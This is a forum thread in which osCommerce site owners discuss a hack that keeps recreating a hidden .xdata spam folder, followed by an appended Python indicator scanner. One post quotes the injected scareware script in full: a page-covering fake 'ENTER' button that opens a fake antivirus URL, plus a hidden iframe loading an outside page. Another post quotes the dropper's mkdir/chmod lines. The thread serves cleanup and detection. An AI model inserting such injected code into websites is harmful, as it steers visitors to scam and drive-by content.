natashome Posted December 13, 2009

I wouldn't have noticed that my site was hacked if Google hadn't sent me an email letting me know that they found some hidden keywords in my pages, that this breaks their rules, and that some pages were taken off the index.

I took a look at my FTP and in that particular domain indeed there were some extra files like this:

1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords

2. a file named Iog.php which contained the following code:

```
document.write('<div style="position: absolute; top: 0; left: 0; width: 100%; height: 4000px; background-color: #FFFFFF; padding: 0px">');
function go() {
    window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100");
}
document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-" onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>');
```

3. a logs file which again has a lot of links and keywords

I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777.

I couldn't find those keywords hidden in my pages at all.

Does anyone have any clue?

Thanks

spooks Posted December 13, 2009

Ask the host to wipe the site then restore from last known clean backup, often the only way to be sure it's all gone.

Then add security http://www.oscommerce.com/forums/index.php?showtopic=313323

Sam

Remember, What you think I meant may not be what I thought I meant when I said it.

Jack_mcs Posted December 13, 2009

Many times a hacker will hide a file somewhere deep within the site that can be used to restore his code so that may be what is happening. If they are being recreated after a time, it might be that the hacker is just getting back in.

If you had had the SiteMonitor addon installed (see My Addons), you would have known about this before Google did. You should still install it and run the hacker test. It might help you locate such hidden files.

melmelmel Posted August 31, 2010

We had the same problem. In our case it was a file called hit.php that was in the root of the site creating and altering folder permissions. For the xdata issue, do a search on your entire site for any of these entries:

```
/***********************\
|        Private        |
|     Coding by nsh     |
|    mtDoor v.0.0.1     |
\***********************/
@mkdir("./.xdata");
@chmod("./.xdata", 0777);
```

We never were able to delete the xdata folder, but were able to rename it and drop the permissions to 0444, after deleting the hit.php file.

Doing a site-wide search for 'preg_replace', 'base64_decode', '<iframe', and 'eval' revealed a TON of malicious code injected in many places even above oscommerce store folder level. Any code on a page above the oscommerce comment intro on the page doesn't belong there.

Hope that info will be of help to someone.
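
An added example, not part of the original posts: a sketch of the site-wide search described in the post above, flagging the four strings it names, the mtDoor banner and `.xdata` calls it quotes, and hidden or world-writable directories. The function names and the sample tree are constructed for illustration.

```python
import os, re, stat, tempfile

# Strings the post says to search for, plus the dropper banner and calls it quotes.
INDICATORS = {
    "preg_replace": re.compile(rb"preg_replace\s*\("),
    "base64_decode": re.compile(rb"base64_decode\s*\("),
    "eval": re.compile(rb"\beval\s*\("),
    "iframe": re.compile(rb"<iframe", re.I),
    "mtDoor banner": re.compile(rb"mtDoor v\.|Coding by nsh"),
    "xdata mkdir/chmod": re.compile(rb"@(?:mkdir|chmod)\(\s*[\"']\./\.xdata"),
}

def scan_tree(root):
    """Return {path relative to root: [findings]} for suspicious dirs and files."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            notes = ["hidden directory"] if d.startswith(".") else []
            if stat.S_IMODE(os.stat(full).st_mode) & stat.S_IWOTH:
                notes.append("world-writable")
            if notes:
                findings[os.path.relpath(full, root)] = notes
        for f in filenames:
            full = os.path.join(dirpath, f)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinks and special files
            with open(full, "rb") as fh:
                data = fh.read()
            hits = [name for name, rx in INDICATORS.items() if rx.search(data)]
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings

def build_sample(root):
    """Constructed sample tree: a clean page, a dropper-like file, a 0777 .xdata."""
    os.mkdir(os.path.join(root, ".xdata"))
    os.chmod(os.path.join(root, ".xdata"), 0o777)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "hit.php"), "w") as fh:
        fh.write('<?php /* mtDoor v.0.0.1 */ @mkdir("./.xdata"); '
                 '@chmod("./.xdata", 0777); ?>\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, notes in sorted(scan_tree(tmp).items()):
            print(f"{path}: {', '.join(notes)}")
```

Legitimate PHP code also calls functions such as preg_replace, so each hit is a lead for manual review against a clean copy of the file, not a verdict.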
Archived
This topic is now archived and is closed to further replies.